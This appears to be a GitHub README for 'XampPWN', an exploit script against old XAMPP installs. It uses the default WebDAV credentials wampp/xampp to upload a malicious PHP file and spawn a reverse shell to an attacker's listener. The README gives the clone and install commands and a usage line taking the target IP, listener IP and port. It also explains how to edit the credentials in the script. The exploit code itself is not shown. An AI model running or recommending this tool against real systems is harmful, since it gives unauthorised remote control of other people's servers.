Versions 1.7.3 and earlier (Some later versions have this manually installed aswell) XAMPP comes shipped with WebDav (Web Distribution Authoring and Versioning) pre-installed and the default credentials set as wampp/xampp. This exploit sends a specially crafted malicious php file for Windows to the target and then executes it, resulting in a reverse shell being executed on a listener.
From within your Linux terminal, you can use the following command to download the program.
git clone https://github.com/0xskunk/XampPWN-WebDav-File-Upload-Exploit.gitWe need to make sure you have the packages installed that the program requires before it will run.
First, install pip, which is a package manager for Python.
sudo apt install python3-pipThen, we install the required libraries.
pip3 install colorama art requests urllib3This is all the prerequisites you need!
XampPWN makes use of the ArgParse library, meaning you can get the help menu to appear by typing:
python3 XAMPPWN.py -hAnd use the script like:
python3 XAMPPWN.py 10.10.10.10 192.16.10.1 443 Make sure your positional arguments are in the order that the program requires when you run the exploit. Don't worry about adding http:// or https:// to the IP address - the program will add that for you if you haven't already.
Note: If the credentials are not wampp/xampp, it's easy enough to edit the script to what you believe they are. Just open it in any text editor and in the init constructor change the username and password!
Special thanks to the following Githubs for the inspiration to write this script:
